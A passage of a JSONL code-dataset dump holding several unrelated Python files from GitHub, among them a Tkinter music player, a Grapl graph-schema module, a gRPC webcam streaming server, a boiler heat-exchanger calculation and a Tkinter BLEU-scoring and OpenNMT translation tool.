bold'),relief=RAISED,overrelief=RIDGE, bg=co3,fg=co1)\nb_random.place(x=314,y=35)\n\n\nos.chdir(r'C:/Users/lucas/OneDrive/Documentos/Musicas')\nmusicas = os.listdir()\n\ndef mostrar():\n for i in musicas:\n listbox.insert(END,i)\n\n\nmostrar()\n\n#Inicando mixer\nmixer.init()\n\n\n\n\njanela.mainloop()\n","repo_name":"LucasDSilva200/MyMusicPlayer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5454,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"16900197849","text":"filmes = [\"Os Vingadores\", \"Forest Gamp\", \"A procura da Felicidade\", \"Como eu era antes de você\", \"O lobo de Wall Street\", \"Dois Coelhos\", \"Up\", \"Lagoa Azul\"]\n\nfilmes_novos = [\"Histórias Cruzadas\", \"Esqueceram de mim\", \"Desventuras em Série \" \"Poderoso chefão\"]\n\nfilmes.extend(filmes_novos)\n\n\nfilmes.append(input(\"Filme:\"))\n\nprint(filmes)\n\nfilmes.sort()\nprint()\nprint(\"Ordenada: \\n\", filmes)\n\nfor i in filmes:\n print(i)\n\nprint()\n\nfilmes.reverse()\n\nfor i in filmes:\n print(i)\n\nfilmes.insert(', \"Pianista')\nfilmes.insert(10, \"Projeto X\")\n\nfor filme in filmes:\n print(filme)","repo_name":"rosifurst/Blue-Edtech_M-dulo01","sub_path":"filmes.py","file_name":"filmes.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"8589507414","text":"from __future__ import annotations\nimport json\nimport logging\nimport os\nimport sys\n\nfrom typing import Any, TypeVar, Set, Type, Optional, List, Dict, Tuple, Union, Callable\n\nfrom grapl_analyzerlib.grapl_client import GraphClient\nfrom grapl_analyzerlib.node_types import (\n EdgeT,\n PropType,\n PropPrimitive,\n)\nfrom grapl_analyzerlib.queryable import Queryable\nfrom grapl_analyzerlib.schema import Schema\nfrom grapl_analyzerlib.viewable import Viewable\n\nBQ = TypeVar(\"BQ\", bound=\"BaseQuery\")\nBV = TypeVar(\"BV\", bound=\"BaseView\")\n\n\nGRAPL_LOG_LEVEL = os.getenv(\"GRAPL_LOG_LEVEL\")\nLEVEL = \"ERROR\" if GRAPL_LOG_LEVEL is None else GRAPL_LOG_LEVEL\nLOGGER = logging.getLogger(__name__)\nLOGGER.setLevel(LEVEL)\nLOGGER.addHandler(logging.StreamHandler(stream=sys.stdout))\n\n\nclass BaseSchema(Schema):\n def __init__(\n self,\n properties: Optional[Dict[str, PropType]] = None,\n edges: Optional[Dict[str, Tuple[EdgeT, str]]] = None,\n view: Union[Type[Viewable], Callable[[], Type[Viewable]]] = None,\n ):\n super(BaseSchema, self).__init__(\n {\n **(properties or {}),\n \"node_key\": PropType(\n PropPrimitive.Str, False, index=[\"hash\"], upsert=True\n ),\n \"last_index_time\": PropType(PropPrimitive.Int, False),\n },\n {\n **(edges or {}),\n },\n view or BaseView,\n )\n\n @staticmethod\n def get_display_property() -> str:\n return \"dgraph_type\"\n\n def generate_type(self) -> str:\n dgraph_builtins = {\"dgraph.type\", \"uid\"}\n\n property_names = [\n p for p in self.properties.keys() if p and p not in dgraph_builtins\n ]\n property_names.extend(self.edges.keys())\n linebreak = \"\\n\" + (\"\\t\" * 4)\n property_str = f\"{linebreak}\".join(property_names)\n type_str = f\"\"\"\n type {self.self_type()} {{\n {property_str}\n }}\n \"\"\"\n return type_str\n\n def generate_schema(self) -> str:\n predicates = []\n dgraph_builtins = {\"dgraph.type\", \"uid\"}\n for prop_name, prop_type in self.properties.items():\n if prop_name in dgraph_builtins:\n continue\n try:\n prim_str = prop_type.prop_type_str()\n index_str = prop_type.prop_index_str()\n predicates.append(f\"{prop_name}: {prim_str} {index_str} .\")\n except Exception as e:\n LOGGER.error(f\"Failed to generate property schema {prop_name} {e}\")\n raise e\n\n for edge_name, (edge_t, r_name) in self.edges.items():\n if not edge_name:\n continue\n\n # Given an edge like ('bin_file', OneToMany, 'spawned_from')\n # That's \"one\" bin_file (ie: uid) to many spawned_from (ie: [uid])\n # which is to say that \"from many\" implies [uid]\n if edge_t.is_from_many():\n predicates.append(f\"{edge_name}: [uid] .\")\n else:\n predicates.append(f\"{edge_name}: uid .\")\n\n return \"\\n\".join(predicates)\n\n @staticmethod\n def self_type() -> str:\n return \"Base\"\n\n\nclass BaseQuery(Queryable[BV, BQ]):\n @classmethod\n def node_schema(cls) -> \"Schema\":\n return BaseSchema()\n\n\nV = TypeVar(\"V\", bound=\"Viewable\")\n\n\nclass BaseView(Viewable[BV, BQ]):\n queryable = BaseQuery\n\n def __init__(\n self,\n uid: int,\n node_key: str,\n graph_client: Any,\n node_types: Set[str],\n **kwargs,\n ):\n super().__init__(uid, node_key, graph_client, **kwargs)\n self.node_types = node_types\n self.uid = uid\n self.node_key = node_key\n\n def into_view(self, v: Type[\"V\"]) -> Optional[\"V\"]:\n if v.node_schema().self_type() in self.node_types:\n self.queryable = v.queryable\n node_types = self.node_types.union(self.predicates.get(\"node_types\", set()))\n predicates_without_node_types = self.predicates.copy()\n predicates_without_node_types.pop(\"node_types\", None)\n return v(\n uid=self.uid,\n node_key=self.node_key,\n graph_client=self.graph_client,\n node_types=node_types,\n **predicates_without_node_types,\n )\n return None\n\n @staticmethod\n def from_node_key(graph_client: GraphClient, node_key: str) -> \"Optional[BaseView]\":\n self_node = BaseQuery().with_node_key(eq=node_key).query_first(graph_client)\n\n return self_node\n\n @classmethod\n def node_schema(cls) -> \"Schema\":\n return BaseSchema({}, {}, BaseView)\n\n def _expand(self, edge_str: Optional[List[str]] = None):\n # get the raw dictionary for this type\n if edge_str:\n edge_filters = \" AND \" + \" AND \".join(edge_str or [])\n else:\n edge_filters = \"\"\n query = f\"\"\"\n query q0($a: string) {{\n edges(func: eq(node_key, $a) , first: 1) {{\n uid\n dgraph.type\n node_key\n expand(_all_) @filter(has(dgraph.type) AND has(node_key) {edge_filters}) {{\n uid\n dgraph.type\n expand(_all_)\n }}\n }}\n\n properties(func: eq(node_key, $a) , first: 1) {{\n uid\n dgraph.type\n expand(_all_)\n }}\n }}\n \"\"\"\n txn = self.graph_client.txn(read_only=True, best_effort=True)\n\n try:\n qres = json.loads(txn.query(query, variables={\"$a\": self.node_key}).json)\n finally:\n txn.discard()\n\n d = qres.get(\"edges\")\n if d:\n self_node = BaseView.from_dict(d[0], self.graph_client)\n self.predicates = {**self.predicates, **self_node.predicates}\n\n d = qres.get(\"properties\")\n if d:\n self_node = BaseView.from_dict(d[0], self.graph_client)\n self.predicates = {**self.predicates, **self_node.predicates}\n\n return None\n\n def to_adjacency_list(self):\n from grapl_analyzerlib.viewable import traverse_view_iter\n from collections import defaultdict\n\n node_dicts = defaultdict(dict)\n edges = defaultdict(list)\n for node in traverse_view_iter(self):\n node_dict = node.to_dict()\n node_dicts[node_dict[\"node\"][\"node_key\"]] = node_dict[\"node\"]\n edges[node_dict[\"node\"][\"node_key\"]].extend(node_dict[\"edges\"])\n\n return {\"nodes\": node_dicts, \"edges\": edges}\n\n def to_dict(self):\n node_dict = {\n \"uid\": self.uid,\n \"node_key\": self.node_key,\n \"dgraph.type\": self.node_schema().self_type(),\n }\n self_key = self.node_key\n edges = []\n for predicate_name, predicate in self.predicates.items():\n if not predicate:\n continue\n\n if isinstance(predicate, Viewable):\n edges.append(\n {\n \"from\": self_key,\n \"edge_name\": predicate_name,\n \"to\": predicate.node_key,\n }\n )\n continue\n elif isinstance(predicate, list) and isinstance(predicate[0], Viewable):\n for p in predicate:\n edges.append(\n {\n \"from\": self_key,\n \"edge_name\": predicate_name,\n \"to\": p.node_key,\n }\n )\n continue\n else:\n if isinstance(predicate, set):\n node_dict[predicate_name] = list(predicate)\n else:\n if not isinstance(predicate, Viewable) and not (\n isinstance(predicate, list)\n and isinstance(predicate[0], Viewable)\n ):\n node_dict[predicate_name] = predicate\n\n return {\"node\": node_dict, \"edges\": edges}\n\n # def expand_neighbors(self, filter):\n # # get the raw dictionary for this type\n # query = f\"\"\"\n # query res($a: string)\n # {{\n # query(func: uid($a, first: 1) {{\n # expand(_all_)\n # }}\n # }}\n # \"\"\"\n # txn = self.graph_client.txn(read_only=True, best_effort=True)\n #\n # try:\n # res = txn.query(query, variables={\"$a\": self.uid})\n # res = json.loads(res.json)['query']\n # if not res:\n # return\n #\n # if isinstance(res, list):\n # self_node = BaseView.from_dict(res[0], self.graph_client)\n # else:\n # self_node = BaseView.from_dict(res, self.graph_client)\n # self.predicates = {**self_node.predicates, **self.predicates}\n # finally:\n # txn.discard()\n","repo_name":"macasieb/grapl","sub_path":"src/python/grapl_analyzerlib/grapl_analyzerlib/nodes/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":9101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"10515673840","text":"#!/usr/bin/env python\n\n################################################################################\n#\n# A simple script to count the number of sentences and tokens in a given\n# TreeBank file. Simply provide the filenames as the input and the number of\n# sentences will first be output followed by the number of tokens across all\n# TreeBanks.\n#\n################################################################################\n\nfrom lib.conll import TreeBank\n\nimport os\nimport sys\n\nif len(sys.argv) < 2:\n raise TypeError('Have to count at least one file!')\n\nfilenames = sys.argv[1:]\ntb = TreeBank()\n\ns_count = 0\nt_count = 0\nfor fn in filenames:\n for sentence in tb.genr(fn):\n s_count += 1\n t_count += len(sentence.words)\n\nprint('{} sentences'.format(s_count))\nprint('{} tokens'.format(t_count))\n","repo_name":"matgrioni/conll-inconsistency","sub_path":"tb-size.py","file_name":"tb-size.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"17387025980","text":"# カメラ映像を接続されたクライアントに送信する\n\n#============================================================\n# import packages\n#============================================================\nfrom concurrent import futures\nimport grpc\nimport Datas_pb2\nimport Datas_pb2_grpc\nimport time\nimport cv2\nimport base64\nimport sys\n\n#============================================================\n# property\n#============================================================\n# カメラを設定\ncap = cv2.VideoCapture(0)\ncap.set(cv2.CAP_PROP_FRAME_WIDTH, 640)\ncap.set(cv2.CAP_PROP_FRAME_HEIGHT, 480)\n\ncaptureBuffer = None\n\n\n#============================================================\n# class\n#============================================================\n# サーバークラス\nclass Greeter(Datas_pb2_grpc.MainServerServicer):\n\n\t#==========\n\tdef __init__(self):\n\t\tpass\n\n\t#==========\n\tdef getStream(self, request_iterator, context):\n\n\t\tfor req in request_iterator:\n\n\t\t\t# リクエストメッセージを表示\n\t\t\tprint(\"request message = \", req.msg)\n\n\t\t\twhile True:\n\n\t\t\t\t# グレースケールに変換\n\t\t\t\tgray = cv2.cvtColor(captureBuffer, cv2.COLOR_BGR2GRAY)\n\n\t\t\t\t# jpgとしてデータをエンコード\n\t\t\t\tret, buf = cv2.imencode('.jpg', gray)\n\t\t\t\tif ret != 1:\n\t\t\t\t\treturn\n\t\t\t\t\n\t\t\t\t# 画像を文字列などで扱いたい場合はbase64でエンコード\n\t\t\t\t# b64e = base64.b64encode(buf)\n\t\t\t\t#print(\"base64 encode size : \", sys.getsizeof(b64e))\n\n\t\t\t\t# データを送信\n\t\t\t\tyield Datas_pb2.Reply(datas = buf.tobytes())\n\n\t\t\t\t# 60FPSに設定\n\t\t\t\ttime.sleep(1/ 60)\n\n\n\n#============================================================\n# functions\n#============================================================\ndef serve():\n\n\t# サーバーを生成\n\tserver = grpc.server(futures.ThreadPoolExecutor(max_workers = 10))\n\tDatas_pb2_grpc.add_MainServerServicer_to_server(Greeter(), server)\n\n\t# ポートを設定\n\tserver.add_insecure_port('[::]:50051')\n\n\t# 動作開始\n\tserver.start()\n\n\tprint('server start')\n\n\twhile True:\n\t\ttry:\n\t\t\t# カメラ映像から読み込み\n\t\t\tret, frame = cap.read()\n\t\t\tif ret != 1:\n\t\t\t\tcontinue\n\n\t\t\tglobal captureBuffer\n\t\t\tcaptureBuffer = frame\n\n\t\t\t# 確認用ウィンドウ表示\n\t\t\tcv2.imshow('Capture Image', captureBuffer)\n\n\t\t\t# ESCキーで抜ける\n\t\t\tk = cv2.waitKey(1)\n\t\t\tif k == 27:\n\t\t\t\tserver.stop(0)\n\t\t\t\tbreak\n\n\t\t\ttime.sleep(0)\n\n\t\texcept KeyboardInterrupt:\n\t\t\tserver.stop(0)\n\n\n\n#============================================================\n# main\n#============================================================\nif __name__ == '__main__':\n\tserve()\n\n#============================================================\n# after the App exit\n#============================================================\ncap.release()\ncv2.destroyAllWindows()","repo_name":"Iwanaka/Python_Grpc_VideoStream_Sample","sub_path":"VideoStream_fromServer_Sample/Server.py","file_name":"Server.py","file_ext":"py","file_size_in_byte":2778,"program_lang":"python","lang":"fr","doc_type":"code","stars":12,"dataset":"github-code","pt":"48"} +{"seq_id":"9266986685","text":"import math\nfrom . import newton_method\nfrom pyXSteam.XSteam import XSteam\nWaterSteam = XSteam(XSteam.UNIT_SYSTEM_MKS)\n\n\nclass VZP:\n def __init__(self, boiler, type, name, unknown, stat, tipdvizh, vii, tii, F, fg, fi_pp,\n delta_alfa, ksi0, delta_ksi, wg, wp, air_number, gaz_number):\n self.vi = 1\n self.ti = 1\n self.Hi = 1\n self.hi = 1\n self.k = 0\n self.deltat = 0\n self.Qb = 0\n self.Br = 1\n self.Pi = 1\n self.Pii = 1\n self.Bi_air = 1\n self.Bii_air = 1\n self.fi = 1\n self.bettagvii = 1\n self.bettagvi = 1\n self.Qlvh = 1\n self.Ql = 1\n self.Qlvyh = 1\n self.alfai = 1\n self.alfaii = 1\n self.vc_rec = 0\n self.H_rec = 0\n self.Vg = 1\n ##########################\n self.boiler = boiler\n self.type = type\n self.name = name\n self.unknown = unknown\n self.tipdvizh = tipdvizh\n self.vii = vii\n self.tii = tii\n self.Hii = math.nan\n self.hii = math.nan\n self.F = F\n self.fg = fg\n self.fi_pp = fi_pp\n self.ksi0 = ksi0\n self.delta_ksi = delta_ksi\n self.wg = wg\n self.wp = wp\n self.air_number = air_number\n self.gaz_number = gaz_number\n self.delta_alfa = delta_alfa\n self.stat = stat\n self.all = all = {\n 'Hi' : 'Hi',\n 'hi' : 'hi_air',\n 'Hii' : 'Hii',\n 'hii' : 'hii_air',\n 'F' : 'F',\n }\n self.varia = varia = list(set(all.values()) - set(stat) - set(unknown))\n self.unknown_local = unknown_local = list(key for key, value in all.items() if value in unknown)\n\n Bi = property(lambda self: self.Br, lambda self, value: setattr(self, 'Br', value))\n Bii = property(lambda self: self.Br, lambda self, value: setattr(self, 'Br', value))\n Hi_air = property(lambda self: self.hi, lambda self, value: setattr(self, 'hi', value))\n Hii_air = property(lambda self: self.hii, lambda self, value: setattr(self, 'hii', value))\n ti_air = property(lambda self: self.ti, lambda self, value: setattr(self, 'ti', value))\n tii_air = property(lambda self: self.tii, lambda self, value: setattr(self, 'tii', value))\n\n def __Qb_method(self):\n\n self.Qb = self.k * self.deltat * self.F / 1000\n\n def __k_method(self, wg, wp):\n ksi = self.ksi0 + self.delta_ksi\n k = 3 * ksi * math.pow(wg + 0.5 * wp, 0.8)\n return k\n\n def __vzpiter(self, argum):\n boiler, alfai, vc_rec, H_rec, unknown, vi, ti, alfaii, vii, tii, unknown_local, tipdvizh,\\\n wg, wp, delta_alfa, Br, fi, Ql, bettagvii = \\\n self.boiler, self.alfai, self.vc_rec, self.H_rec, self.unknown, self.vi, self.ti, self.alfaii,\\\n self.vii, self.tii, self.unknown_local, self.tipdvizh, self.wg, self.wp, self.delta_alfa, self.Br,\\\n self.fi, self.Ql, self.bettagvii\n\n access = False\n self.Hi = Hi = argum['Hi']\n self.Hii = Hii = argum['Hii']\n self.hi = hi = argum[\"hi_air\"]\n self.hii = hii = argum[\"hii_air\"]\n self.F = F = argum[\"F\"]\n\n prov_argum = {\n 'Hii' : 0,\n 'hii_air' : 0,\n }\n self.vi = vi = boiler.vgaz(Hi, alfai, vc_rec, H_rec) if 'Hi' in unknown else self.vi\n self.ti = ti = boiler.tAIR(hi) if 'hi_air' in unknown else self.ti\n self.vii = vii = boiler.vgaz(Hii, alfaii, vc_rec, H_rec) if 'Hii' in unknown else self.vii\n self.tii = tii = boiler.tAIR(hii) if 'hii_air' in unknown else self.tii\n\n self.vi, self.ti, self.vii, self.tii, access = vi, ti, vii, tii, access = newton_method.restrictions(unknown_local, tipdvizh, access, vi, ti, vii, tii)\n if access == True:\n self.Hi = Hi = argum['Hi'] = boiler.HGAZ(vi, alfai, vc_rec, H_rec) if 'Hi' in unknown else self.Hi\n self.Hii = Hii = argum['Hii'] = boiler.HGAZ(vii, alfaii, vc_rec, H_rec) if 'Hii' in unknown else self.Hii\n self.hi = hi = argum['hi_air'] = boiler.HAIR(ti) if 'hi_air' in unknown else self.hi\n self.hii = hii = argum['hii_air'] = boiler.HAIR(tii) if 'hii_air' in unknown else self.hii\n\n k = self.__k_method(wg, wp)\n deltat = boiler.tempnap(tipdvizh, vi, ti, vii, tii)\n Hpris = boiler.HAIR((ti + tii) / 2)\n prov_argum[\"Hii\"] = Hi + delta_alfa * Hpris - k * F * deltat / (Br * 1000 * fi)\n prov_argum[\"hii_air\"] = hi + ((k * F * deltat) / (Br * 1000) + Ql) / (bettagvii + delta_alfa / 2)\n\n self.vi, self.ti, self.vii, self.tii, self.k, self.deltat = vi, ti, vii, tii, k, deltat\n\n return prov_argum\n\n def __kornivzp(self):\n boiler, bettagvi, delta_alfa, Bi_air, Qlvh, fi_pp, alfai, vi, ti, vii, tii, F, unknown, vc_rec, \\\n H_rec, Hi, hi, Hii, hii = \\\n self.boiler, self.bettagvi, self.delta_alfa, self.Bi_air, self.Qlvh, self.fi_pp, self.alfai, \\\n self.vi, self.ti, self.vii, self.tii, self.F, self.unknown, self.vc_rec, self.H_rec, \\\n self.Hi, self.hi, self.Hii, self.hii\n\n self.bettagvii = bettagvii = bettagvi - delta_alfa\n self.Bii_air = Bii_air = Bi_air\n self.Qlvyh = Qlvyh = Qlvh * (1 - fi_pp)\n self.Ql = Ql = Qlvh - Qlvyh\n self.alfaii = alfaii = alfai + delta_alfa\n\n argum_temp = {\n 'Hi' : vi,\n 'hi_air': ti,\n 'Hii': vii,\n 'hii_air': tii,\n 'F': F,\n }\n\n newton_method.argum_nan(argum_temp)\n\n newton_method.argum_pre(unknown, argum_temp)\n\n self.vi = vi = argum_temp[\"Hi\"]\n self.ti = ti = argum_temp[\"hi_air\"]\n self.vii = vii = argum_temp[\"Hii\"]\n self.tii = tii = argum_temp[\"hii_air\"]\n self.F = F = argum_temp[\"F\"]\n\n argum = {\n 'Hi' : boiler.HGAZ(vi, alfai, vc_rec, H_rec) if 'Hi' in unknown or math.isnan(Hi) else Hi,\n 'hi_air' : boiler.HAIR(ti) if 'hi_air' in unknown or math.isnan(hi) else hi,\n 'Hii' : boiler.HGAZ(vii, alfaii, vc_rec, H_rec) if 'Hii' in unknown or math.isnan(Hii) else Hii,\n 'hii_air': boiler.HAIR(tii) if 'hii_air' in unknown or math.isnan(hii) else hii,\n 'F' : F,\n }\n\n newton_method.newton_method(self.__vzpiter, argum, unknown)\n #self.Hi, self.hi, self.Hii, self.hii, self.F = argum.values()\n\n def poisk_korney(self):\n Br, boiler, alfai, delta_alfa = self.Br, self.boiler, self.alfai, self.delta_alfa\n if math.isnan(Br):\n self.Br = 20\n self.vc_rec = boiler.vc_rec\n self.H_rec= boiler.H_rec\n self.Vg = boiler.Vg(alfai + delta_alfa / 2, boiler.Vg_rec)\n self.fi = boiler.fi\n self.__kornivzp()\n self.__Qb_method()\n\n","repo_name":"Karceri/BoilerCalc_Django","sub_path":"boiler_calc/thermal_calculation/classes/vzp.py","file_name":"vzp.py","file_ext":"py","file_size_in_byte":6799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2406510069","text":"import tkinter as tk\nfrom tkinter import ttk\nfrom unittest import skip\nfrom weakref import ref\nfrom nltk.translate.bleu_score import sentence_bleu\nimport spacy\nimport tkinter.scrolledtext as st\nimport os\nimport subprocess\nimport time\nfrom tkinter import filedialog as fd\nimport matplotlib.pyplot as plt\nimport matplotlib\nmatplotlib.use(\"TkAgg\")\nfrom matplotlib.backends.backend_tkagg import (FigureCanvasTkAgg, \nNavigationToolbar2Tk)\nfrom matplotlib.figure import Figure\nimport numpy\nfrom tkinter.simpledialog import askstring as AS\nfrom threading import Thread\n\ndef slicePersonal(li):\n \n li = list(filter(lambda a: a != \" \\n\", li))\n \n lll = li\n counter = 4\n for i in lll:\n if countercandidateLength):\n while(len(referencePOSlist) > counter):\n try:\n if(candidatePOSlist[counter]==referencePOSlist[counter]):\n returnDictionary['correctly placed tags'].append(f'{candidatePOSlist[counter]} {counter}')\n correctcounter+=1\n except:\n skip\n finally: \n counter+=1 \n \n else:\n while(candidateLength > counter):\n try:\n if(referencePOSlist[counter]==candidatePOSlist[counter]):\n returnDictionary['correctly placed tags'].append(f'{candidatePOSlist[counter]} {counter}')\n correctcounter+=1\n except:\n skip\n finally:\n counter+=1 \n \n #Calculating the final score. Mistakes is calculated by subtracting the correctcounter from the length of the candidate text\n mistakes = candidateLength - correctcounter\n #partial is calculated by bleu score divided by the candidate length\n partial = netscore/candidateLength\n #deduction is calculated by mistakes times the partial\n deduction = mistakes*partial\n #grossscore is the final score, which is the bleu score minus the deduction \n grossscore = netscore - deduction\n \n returnDictionary['grs'] = grossscore\n \n return returnDictionary\n\ndef compare_POS(referencetxt, candidatetxt):\n referencePOSlist = getPOS(referencetxt)\n candidatePOSlist = getPOS(candidatetxt)\n \n counter = 0\n correctcounter = 0\n candidateLength = len(candidatePOSlist)\n \n if(len(referencePOSlist)>candidateLength):\n while(len(referencePOSlist) > counter):\n try:\n if(candidatePOSlist[counter]==referencePOSlist[counter]):\n correctcounter+=1\n except:\n skip\n finally: \n counter+=1 \n \n else:\n while(candidateLength > counter):\n try:\n if(referencePOSlist[counter]==candidatePOSlist[counter]):\n correctcounter+=1\n except:\n skip\n finally:\n counter+=1 \n \n return f'{correctcounter} of {len(referencePOSlist)}'\n \n\n\n\n# class fr2(tk.Frame):\n def __init__(self, master):\n self.nlp = spacy.load('en_core_web_sm')\n \n self.counter=0\n \n self.ref_list = []\n with open('reference.txt',mode='r') as re:\n for line in re:\n self.ref_list.append(line)\n \n self.ca_list = []\n with open('candidate.txt',mode='r') as f:\n for line in f:\n self.ca_list.append(line)\n \n self.ref_being_evaluated = self.ref_list[self.counter]\n self.cand_being_evaluated = self.ca_list[self.counter]\n \n \n \n \n \n #reftxt = ' '.join([str(word) for word in pos_list])\n \n subframe = Frame(master, background=\"blue\")\n self.reflbl = Label(subframe, text = \"Reference Text\")\n self.reflbl.place(relx=0.5,anchor=N)\n self.reftxt = Label(subframe, text = self.ref_being_evaluated)\n self.reftxt.place(relx=0.5, rely=0.5,anchor='center')\n subframe.pack(expand = True, fill = BOTH, side=LEFT)\n \n \n \n \n \n \n subframe2 = ttk.Frame(master, background=\"red\")\n self.candlbl = ttk.Label(subframe2, text=\"Candidate Text\")\n self.candlbl.place(relx=0.5,anchor=N)\n self.candtxt = ttk.Label(subframe2, text= self.cand_being_evaluated)\n self.candtxt.place(relx=0.5, rely=0.5,anchor=CENTER) \n \n bleuscore = sentence_bleu(list(self.ref_being_evaluated), list(self.cand_being_evaluated), weights=(1, 0, 0, 0))\n \n dictOutput = structure_evaluation(self.nlp(self.ref_being_evaluated),self.nlp(self.cand_being_evaluated), bleuscore)\n \n self.bleu_lbl = ttk.Label(subframe2, text = 'standard bleu score: ' + str(bleuscore))\n self.bleu_lbl.place(relx=0.5, rely=0.6,anchor=CENTER)\n self.gross_lbl = ttk.Label(subframe2, text = 'Structure sensitive Bleu score: ' + str(dictOutput['grs']))\n self.gross_lbl.place(relx=0.5, rely=0.7, anchor = CENTER)\n self.corr_lbl = ttk.Label(subframe2, text = f'Correctly placed POS tags:' + str(dictOutput['correctly placed tags']))\n self.corr_lbl.place(relx=0.5, rely=0.8, anchor = CENTER)\n self.compare_lbl = ttk.Label(subframe2, text = f'Number of correctly placed tags: {compare_POS(self.nlp(self.ref_being_evaluated), self.nlp(self.cand_being_evaluated))}')\n self.compare_lbl.place(relx=0.5, rely=0.9, anchor = CENTER)\n subframe2.pack(expand=True, fill=BOTH, side=LEFT)\n \n self.btn_next = ttk.Button(subframe,text=\"Next\",command =self.updateTexts)\n self.btn_next.place(relx=0.5, rely=0.8, anchor = CENTER)\n \n def updateTexts(self):\n self.ref_being_evaluated = self.ref_list[self.counter]\n self.cand_being_evaluated = self.ca_list[self.counter]\n self.reftxt[\"text\"] = self.ref_being_evaluated\n self.candtxt[\"text\"] = self.cand_being_evaluated\n internal_bleu_score = sentence_bleu(list(self.ref_being_evaluated), list(self.cand_being_evaluated), weights=(1, 0, 0, 0))\n self.bleu_lbl[\"text\"] = 'standard bleu score: ' + str(internal_bleu_score)\n internalDictOutput = dictOutput = structure_evaluation(self.nlp(self.ref_being_evaluated),self.nlp(self.cand_being_evaluated), internal_bleu_score)\n self.gross_lbl[\"text\"] = 'Structure sensitive Bleu score: ' + str(internalDictOutput['grs'])\n self.corr_lbl[\"text\"] = f'Correctly placed POS tags:' + str(internalDictOutput['correctly placed tags'])\n self.compare_lbl[\"text\"] = f'Number of correctly placed tags: {compare_POS(self.nlp(self.ref_being_evaluated), self.nlp(self.cand_being_evaluated))}'\n self.counter+=1\n \n # self.c+=1 \n # print(self.c)\n # reftxt = re_list[self.c]\n # candtxt = ca_list[self.c]\n # self.subject.config(text=reftxt)\n # self.message.config(text=candtxt)\n \nclass Display:\n def __init__(self):\n self.root = tk.Tk()\n \n self.root.geometry('900x600')\n self.root.resizable(False,False)\n self.root.title(\"Structure Sensitive BLEU\")\n \n self.tabControl = ttk.Notebook(self.root)\n \n \n ##1ST TAB\n ##TRANSLATION \n ##STAGE\n \n self.tab1 = ttk.Frame(self.tabControl)\n \n #self.tab1.columnconfigure(0, weight=1)\n #self.tab1.columnconfigure(1, weight=2)\n \n self.tabControl.add(self.tab1, text=\"Translation\")\n \n self.tab1origLbl = ttk.Label(self.tab1, text = \"Original Text\")\n self.tab1origLbl.grid(row=0,column=0, padx=20, pady=20)\n \n self.tab2transLbl = ttk.Label(self.tab1, text = \"Translated Text\")\n self.tab2transLbl.grid(row=0,column=1)\n \n self.text_area = st.ScrolledText(self.tab1,\n width = 50, \n height = 24, \n font = (\"Times New Roman\",\n 12))\n # self.text_area.grid(row = 0, column = 0, rowspan= 3)\n self.text_area.grid(row = 1, column = 0, padx=20)\n self.text_area.configure(state ='disabled')\n \n self.translated_text_area = st.ScrolledText(self.tab1, width = 50, height = 24, font = (\"Times New Roman\", 12))\n self.translated_text_area.grid(row = 1, column = 1)\n self.translated_text_area.configure(state='disabled')\n \n def vocab_clicked(func,samplesize):\n Thread(target=run_vocab_thread,args=(func,samplesize)).start()\n def onmtVocab(samplesize):\n os.chdir('Collab files')\n os.system(r'onmt_build_vocab -config en_tl.yaml -n_sample ' + str(samplesize))\n # textwidget.configure(state='normal')\n # with open('vocabInfo.txt','r') as file:\n # t = file.read()\n \n # time.sleep(5)\n # textwidget.insert(tk.INSERT, t)\n \n # textwidget.configure(state='disabled')\n \n # os.chdir('Collab files')\n # returned_value = os.system(r'cmd /k onmt_build_vocab -config en_tl.yaml -n_sample 10000')\n # print('returned value: ', returned_value)\n \n def run_vocab_thread(func,samplesize):\n popup = tk.Toplevel()\n tk.Label(popup, text=\"Building the vocabulary\").grid(row=0,column=0)\n\n processing_bar = ttk.Progressbar(popup, orient='horizontal', mode='indeterminate')\n processing_bar.grid(row=1,column=0)\n \n processing_bar.start(interval=10)\n print('vocab', 'started')\n func(samplesize)\n processing_bar.stop()\n print('vocab', 'stopped')\n \n popup.destroy()\n \n def onmtTrain(): \n try:\n #ensure_command()\n os.system(r'onmt_train -config en_tl.yaml 1>opennmt.log 2>&1')\n except AttributeError:\n tk.messagebox.showerror(\"Attribute error\", \"Incompatible system requirements\")\n ##returned_value = os.system(r'cmd /k onmt_train -config en_tl.yaml')\n ##print('returned value: ', returned_value)\n \n def train_clicked(func):\n Thread(target=run_train_thread,args=[func]).start()\n \n def run_train_thread(func):\n popup = tk.Toplevel()\n tk.Label(popup, text=\"Training data\").grid(row=0,column=0)\n\n processing_bar = ttk.Progressbar(popup, orient='horizontal', mode='indeterminate')\n processing_bar.grid(row=1,column=0)\n \n processing_bar.start(interval=10)\n print('train', 'started')\n func()\n processing_bar.stop()\n print('train', 'stopped')\n \n popup.destroy()\n \n self.modelPtFile = None\n self.origTlFile = None\n \n def updTrans(textwidget):\n tk.messagebox.showinfo(\"Upload file\", \"Select a model pytorch file\")\n modelDir = fd.askopenfilename(filetypes=[(\"Pytorch files\", \"*.pt\")])\n self.modelPtFile = os.path.split(modelDir)[1]\n \n tk.messagebox.showinfo(\"Upload file\", \"Select a text file written in Tagalog\")\n origDir = fd.askopenfilename(filetypes=[(\"Tagalog text files\", \"*.tl\")])\n self.origTlFile = os.path.split(origDir)[1]\n \n with open(self.origTlFile,'r') as file:\n origLines = file.read()\n \n textwidget.configure(state='normal')\n textwidget.delete('1.0',tk.END)\n textwidget.insert(tk.INSERT, origLines)\n textwidget.configure(state='disabled')\n \n if self.modelPtFile and self.origTlFile:\n self.btn_translate[\"state\"] = tk.NORMAL\n \n def onmtTranslate(pytorchFile,tlFile,outputFilename):\n os.system(r'onmt_translate -model ' + pytorchFile + ' -src ' + tlFile + ' -output ' + outputFilename + '.txt -verbose')\n \n def run_translate_thread(name, func,pytorchFile,tlFile,outputFilename):\n popup = tk.Toplevel()\n tk.Label(popup, text=\"File being translated\").grid(row=0,column=0)\n\n processing_bar = 